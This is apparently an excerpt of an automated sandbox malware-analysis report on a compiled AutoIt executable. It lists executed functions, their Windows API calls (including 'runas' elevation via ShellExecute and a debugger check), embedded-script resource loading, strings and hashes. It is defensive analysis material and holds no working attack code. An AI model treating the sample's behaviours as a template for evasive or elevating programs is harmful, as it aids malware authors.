103770->103772 103773 8949a0 103771->103773 103772->103771 103774 897667 59 API calls 103773->103774 103775 8949b8 GetVersionExW 103774->103775 103776 897bcc 59 API calls 103775->103776 103777 8949fb 103776->103777 103778 897d2c 59 API calls 103777->103778 103783 894a28 103777->103783 103779 894a1c 103778->103779 103780 897726 59 API calls 103779->103780 103780->103783 103781 894a93 GetCurrentProcess IsWow64Process 103782 894aac 103781->103782 103785 894b2b GetSystemInfo 103782->103785 103786 894ac2 103782->103786 103783->103781 103784 8cd864 103783->103784 103787 894af8 103785->103787 103797 894b37 103786->103797 103787->103765 103790 894b1f GetSystemInfo 103792 894ae9 103790->103792 103791 894ad4 103793 894b37 2 API calls 103791->103793 103792->103787 103795 894aef FreeLibrary 103792->103795 103794 894adc GetNativeSystemInfo 103793->103794 103794->103792 103795->103787 103798 894ad0 103797->103798 103799 894b40 LoadLibraryA 103797->103799 103798->103790 103798->103791 103799->103798 103800 894b51 GetProcAddress 103799->103800 103800->103798 103801 8f8c50 103804 8f8a05 103801->103804 103803 8f8c57 103806 8f8a18 103804->103806 103805 8f8a98 103805->103803 103806->103805 103807 8f8e9f 74 API calls 103806->103807 103807->103806

                                                                        Executed Functions

                                                                        Function 00893B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00893B68
                                                                        • IsDebuggerPresent.KERNEL32(?,?), ref: 00893B7A
                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,009552F8,009552E0,?,?), ref: 00893BEB
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                          • Part of subcall function 008A092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00893C14,009552F8,?,?,?), ref: 008A096E
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00893C6F
                                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00947770,00000010), ref: 008CD281
                                                                        • SetCurrentDirectoryW.KERNEL32(?,009552F8,?,?,?), ref: 008CD2B9
                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00944260,009552F8,?,?,?), ref: 008CD33F
                                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 008CD346
                                                                          • Part of subcall function 00893A46: GetSysColorBrush.USER32(0000000F), ref: 00893A50
                                                                          • Part of subcall function 00893A46: LoadCursorW.USER32(00000000,00007F00), ref: 00893A5F
                                                                          • Part of subcall function 00893A46: LoadIconW.USER32(00000063), ref: 00893A76
                                                                          • Part of subcall function 00893A46: LoadIconW.USER32(000000A4), ref: 00893A88
                                                                          • Part of subcall function 00893A46: LoadIconW.USER32(000000A2), ref: 00893A9A
                                                                          • Part of subcall function 00893A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00893AC0
                                                                          • Part of subcall function 00893A46: RegisterClassExW.USER32(?), ref: 00893B16
                                                                          • Part of subcall function 008939D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00893A03
                                                                          • Part of subcall function 008939D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00893A24
                                                                          • Part of subcall function 008939D5: ShowWindow.USER32(00000000), ref: 00893A38
                                                                          • Part of subcall function 008939D5: ShowWindow.USER32(00000000), ref: 00893A41
                                                                          • Part of subcall function 0089434A: _memset.LIBCMT ref: 00894370
                                                                          • Part of subcall function 0089434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00894415
                                                                        Strings
                                                                        • runas, xrefs: 008CD33A
                                                                        • This is a third-party compiled AutoIt script., xrefs: 008CD279
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                                        • API String ID: 529118366-3287110873
                                                                        • Opcode ID: 2cbc23fa3b6cc186cd26f936e0ce807fa81ecf38be57f8693b105243520ca0c3
                                                                        • Instruction ID: d6df746f5a803f9db81cf90bbdf519951258e262e76bfd22934377894d636245
                                                                        • Opcode Fuzzy Hash: 2cbc23fa3b6cc186cd26f936e0ce807fa81ecf38be57f8693b105243520ca0c3
                                                                        • Instruction Fuzzy Hash: F651E430A1860CAADF11FBB9DC25EFD7B74FF45709F088069F422E61A2DA705645DB22
                                                                        Function 008949A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 904 8949a0-894a00 call 897667 GetVersionExW call 897bcc 909 894b0b-894b0d 904->909 910 894a06 904->910 911 8cd767-8cd773 909->911 912 894a09-894a0e 910->912 913 8cd774-8cd778 911->913 914 894b12-894b13 912->914 915 894a14 912->915 917 8cd77a 913->917 918 8cd77b-8cd787 913->918 916 894a15-894a4c call 897d2c call 897726 914->916 915->916 926 8cd864-8cd867 916->926 927 894a52-894a53 916->927 917->918 918->913 920 8cd789-8cd78e 918->920 920->912 922 8cd794-8cd79b 920->922 922->911 924 8cd79d 922->924 928 8cd7a2-8cd7a5 924->928 929 8cd869 926->929 930 8cd880-8cd884 926->930 927->928 931 894a59-894a64 927->931 932 8cd7ab-8cd7c9 928->932 933 894a93-894aaa GetCurrentProcess IsWow64Process 928->933 938 8cd86c 929->938 934 8cd86f-8cd878 930->934 935 8cd886-8cd88f 930->935 939 894a6a-894a6c 931->939 940 8cd7ea-8cd7f0 931->940 932->933 941 8cd7cf-8cd7d5 932->941 936 894aac 933->936 937 894aaf-894ac0 933->937 934->930 935->938 944 8cd891-8cd894 935->944 936->937 945 894b2b-894b35 GetSystemInfo 937->945 946 894ac2-894ad2 call 894b37 937->946 938->934 947 8cd805-8cd811 939->947 948 894a72-894a75 939->948 942 8cd7fa-8cd800 940->942 943 8cd7f2-8cd7f5 940->943 949 8cd7df-8cd7e5 941->949 950 8cd7d7-8cd7da 941->950 942->933 943->933 944->934 953 894af8-894b08 945->953 961 894b1f-894b29 GetSystemInfo 946->961 962 894ad4-894ae1 call 894b37 946->962 954 8cd81b-8cd821 947->954 955 8cd813-8cd816 947->955 951 894a7b-894a8a 948->951 952 8cd831-8cd834 948->952 949->933 950->933 957 894a90 951->957 958 8cd826-8cd82c 951->958 952->933 960 8cd83a-8cd84f 952->960 954->933 955->933 957->933 958->933 963 8cd859-8cd85f 960->963 964 8cd851-8cd854 960->964 965 894ae9-894aed 961->965 969 894b18-894b1d 962->969 970 894ae3-894ae7 GetNativeSystemInfo 962->970 963->933 964->933 965->953 968 894aef-894af2 FreeLibrary 965->968 968->953 969->970 970->965
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?,?,00000000), ref: 008949CD
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        • GetCurrentProcess.KERNEL32(?,0091FAEC,00000000,00000000,?,?,00000000), ref: 00894A9A
                                                                        • IsWow64Process.KERNEL32(00000000,?,00000000), ref: 00894AA1
                                                                        • GetNativeSystemInfo.KERNELBASE(00000000,?,00000000), ref: 00894AE7
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 00894AF2
                                                                        • GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 00894B23
                                                                        • GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 00894B2F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                        • String ID:
                                                                        • API String ID: 1986165174-0
                                                                        • Opcode ID: bb8e194895336528c4b583f7db9339ea12eaa61b77b9f62877aa082b4d6fb5ef
                                                                        • Instruction ID: 477a563e1b4262691fa7b2b3b6d5b18155aff4f0e022ea48d89acb339180344b
                                                                        • Opcode Fuzzy Hash: bb8e194895336528c4b583f7db9339ea12eaa61b77b9f62877aa082b4d6fb5ef
                                                                        • Instruction Fuzzy Hash: 5691A13198D7C4DACB21EB688550AAABFF5FF2A300B485DADD0CBD3A41D230E509D759
                                                                        Function 00894E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1001 894e89-894ea1 CreateStreamOnHGlobal 1002 894ec1-894ec6 1001->1002 1003 894ea3-894eba FindResourceExW 1001->1003 1004 894ec0 1003->1004 1005 8cd933-8cd942 LoadResource 1003->1005 1004->1002 1005->1004 1006 8cd948-8cd956 SizeofResource 1005->1006 1006->1004 1007 8cd95c-8cd967 LockResource 1006->1007 1007->1004 1008 8cd96d-8cd975 1007->1008 1009 8cd979-8cd98b 1008->1009 1009->1004
                                                                        APIs
                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00894D8E,?,?,00000000), ref: 00894E99
                                                                        • FindResourceExW.KERNEL32(00000000,0000000A,SCRIPT,00000000,?,?,?,?,?,00894D8E,?,?,00000000), ref: 00894EB0
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,00894D8E,?,?,00000000), ref: 008CD937
                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,00894D8E,?,?,00000000), ref: 008CD94C
                                                                        • LockResource.KERNEL32(00894D8E,?,?,?,?,?,00894D8E,?,?,00000000), ref: 008CD95F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                        • String ID: SCRIPT
                                                                        • API String ID: 3051347437-3967369404
                                                                        • Opcode ID: ea762c464c69ae4d6646d61de8dbd5423660aeecfadf140474e56302fe100abe
                                                                        • Instruction ID: 837e13ea929d875f1629a0628e4dfe428f8ad8b277b8266c19785222f03a8ca8
                                                                        • Opcode Fuzzy Hash: ea762c464c69ae4d6646d61de8dbd5423660aeecfadf140474e56302fe100abe
                                                                        • Instruction Fuzzy Hash: 7F11BC70300304ABDB209B65EC48F6B7BBAFBC4B21F148668F416C6250DB71EC01C620
                                                                        Function 008F445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,008CE398), ref: 008F446A
                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 008F447B
                                                                        • FindClose.KERNEL32(00000000), ref: 008F448B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                        • String ID:
                                                                        • API String ID: 48322524-0
                                                                        • Opcode ID: 0f82b7380a0f79120e91feaef572c12295f41932dca6a38e91e7de6de707abbe
                                                                        • Instruction ID: 93db06207ee002cae5206db06fdbd472be990accfc25c27e06e4fb11f45f005a
                                                                        • Opcode Fuzzy Hash: 0f82b7380a0f79120e91feaef572c12295f41932dca6a38e91e7de6de707abbe
                                                                        • Instruction Fuzzy Hash: 1DE0D83352590C6752106B38EC0D4FA775CEE15335F204B16F935E10D0E7745900E599
                                                                        Function 008A09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008A0A5B
                                                                        • timeGetTime.WINMM ref: 008A0D16
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008A0E53
                                                                        • Sleep.KERNEL32(0000000A), ref: 008A0E61
                                                                        • LockWindowUpdate.USER32(00000000,0095546C), ref: 008A0EFA
                                                                        • DestroyWindow.USER32 ref: 008A0F06
                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008A0F20
                                                                        • Sleep.KERNEL32(0000000A,00955310,0095546C), ref: 008D4E83
                                                                        • TranslateMessage.USER32(?), ref: 008D5C60
                                                                        • DispatchMessageW.USER32(?), ref: 008D5C6E
                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008D5C82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                        • API String ID: 4212290369-3242690629
                                                                        • Opcode ID: 1349bcfc64d645e50d4867a7b5eb4bf2d9e3f1210c8ad0fe33bb23414e29eda0
                                                                        • Instruction ID: cc25c0e1da62b752b2b08bd25fead477c373fd89d5b74029d966044cd6b4a204
                                                                        • Opcode Fuzzy Hash: 1349bcfc64d645e50d4867a7b5eb4bf2d9e3f1210c8ad0fe33bb23414e29eda0
                                                                        • Instruction Fuzzy Hash: E1B2AC70608745DFEB24DF28C894BAAB7E1FF85314F144A1EE49AD72A1DB70E844DB42
                                                                        Function 008F9155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 008F8F5F: __time64.LIBCMT ref: 008F8F69
                                                                          • Part of subcall function 00894EE5: _fseek.LIBCMT ref: 00894EFD
                                                                        • __wsplitpath.LIBCMT ref: 008F9234
                                                                          • Part of subcall function 008B40FB: __wsplitpath_helper.LIBCMT ref: 008B413B
                                                                        • _wcscpy.LIBCMT ref: 008F9247
                                                                        • _wcscat.LIBCMT ref: 008F925A
                                                                        • __wsplitpath.LIBCMT ref: 008F927F
                                                                        • _wcscat.LIBCMT ref: 008F9295
                                                                        • _wcscat.LIBCMT ref: 008F92A8
                                                                          • Part of subcall function 008F8FA5: _memmove.LIBCMT ref: 008F8FDE
                                                                          • Part of subcall function 008F8FA5: _memmove.LIBCMT ref: 008F8FED
                                                                        • _wcscmp.LIBCMT ref: 008F91EF
                                                                          • Part of subcall function 008F9734: _wcscmp.LIBCMT ref: 008F9824
                                                                          • Part of subcall function 008F9734: _wcscmp.LIBCMT ref: 008F9837
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008F9452
                                                                        • _wcsncpy.LIBCMT ref: 008F94C5
                                                                        • DeleteFileW.KERNEL32(?), ref: 008F94FB
                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008F9511
                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008F9522
                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008F9534
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                        • String ID:
                                                                        • API String ID: 1500180987-0
                                                                        • Opcode ID: 1962a319d8b9fb3c34622de6cafebab39ed9f983b38824d92ca0ff6b6af07c8e
                                                                        • Instruction ID: f27631dcbfc9bbf9a8f4239e88d90f03418145f77e92b1e694d8ff37fdc2804a
                                                                        • Opcode Fuzzy Hash: 1962a319d8b9fb3c34622de6cafebab39ed9f983b38824d92ca0ff6b6af07c8e
                                                                        • Instruction Fuzzy Hash: FEC11CB1D0021DAADF21DFA9CC85EEEB7B9FF55310F0040AAF609E6251DB309A458F65
                                                                        Function 0089301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00893074
                                                                        • RegisterClassExW.USER32(00000030), ref: 0089309E
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008930AF
                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 008930CC
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008930DC
                                                                        • LoadIconW.USER32(000000A9), ref: 008930F2
                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00893101
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                        • API String ID: 2914291525-1005189915
                                                                        • Opcode ID: 939f771428c3fc120b43cddc367382c3cc1e00c5c823c097a9b0103828e2d4bf
                                                                        • Instruction ID: c5d222e18c0b433b5d9852e35a266559fa397de28f05df1c7d7f8d355521d407
                                                                        • Opcode Fuzzy Hash: 939f771428c3fc120b43cddc367382c3cc1e00c5c823c097a9b0103828e2d4bf
                                                                        • Instruction Fuzzy Hash: 3E3147B1965309AFDB00CFA4E895AC9BBF0FF08311F10812AF690A62A1D3B50585DF91
                                                                        Function 00893041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00893074
                                                                        • RegisterClassExW.USER32(00000030), ref: 0089309E
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008930AF
                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 008930CC
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008930DC
                                                                        • LoadIconW.USER32(000000A9), ref: 008930F2
                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00893101
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                        • API String ID: 2914291525-1005189915
                                                                        • Opcode ID: b7c352476fbd815a96d97bc0bcd3a8811b791e8b8dc0b5dd102a05b1977408d0
                                                                        • Instruction ID: dff9fdc5ea8860fc9e64c3e6c3cd03dde67c64a139ddf3f07b6acea5a01f7fe7
                                                                        • Opcode Fuzzy Hash: b7c352476fbd815a96d97bc0bcd3a8811b791e8b8dc0b5dd102a05b1977408d0
                                                                        • Instruction Fuzzy Hash: 6F21E5B1A2930CAFDB00DFA5E858BDDBBF4FB08701F00812AF610A62A1D7B14544EF91
                                                                        Function 0089708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00894706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,0089715A,?,?,?,?,0089108C,?), ref: 00894724
                                                                          • Part of subcall function 008B050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00897165,?,?,?,?,0089108C,?), ref: 008B052D
                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\,?,?,?,?,0089108C,?), ref: 008971A8
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,?,?,?,0089108C,?), ref: 008CE8C8
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,?,?,0089108C,?), ref: 008CE909
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,0089108C,?), ref: 008CE947
                                                                        • _wcscat.LIBCMT ref: 008CE9A0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                        • API String ID: 2673923337-2727554177
                                                                        • Opcode ID: 3c9d472d1bb3b72ada62d18e2ce5c20d3d47b3e44ca3fdaf0d56803ea51d2a99
                                                                        • Instruction ID: 55e714d9505d43c130edaefdee36b3497374347c3920c0bdc4343f871bf287c0
                                                                        • Opcode Fuzzy Hash: 3c9d472d1bb3b72ada62d18e2ce5c20d3d47b3e44ca3fdaf0d56803ea51d2a99
                                                                        • Instruction Fuzzy Hash: CB718E715283059EC710EF2AE8419ABBBF8FF95310F84452EF495C72A1EB70D948DB52
                                                                        Function 00893A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00893A50
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00893A5F
                                                                        • LoadIconW.USER32(00000063), ref: 00893A76
                                                                        • LoadIconW.USER32(000000A4), ref: 00893A88
                                                                        • LoadIconW.USER32(000000A2), ref: 00893A9A
                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00893AC0
                                                                        • RegisterClassExW.USER32(?), ref: 00893B16
                                                                          • Part of subcall function 00893041: GetSysColorBrush.USER32(0000000F), ref: 00893074
                                                                          • Part of subcall function 00893041: RegisterClassExW.USER32(00000030), ref: 0089309E
                                                                          • Part of subcall function 00893041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008930AF
                                                                          • Part of subcall function 00893041: InitCommonControlsEx.COMCTL32(?), ref: 008930CC
                                                                          • Part of subcall function 00893041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008930DC
                                                                          • Part of subcall function 00893041: LoadIconW.USER32(000000A9), ref: 008930F2
                                                                          • Part of subcall function 00893041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00893101
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
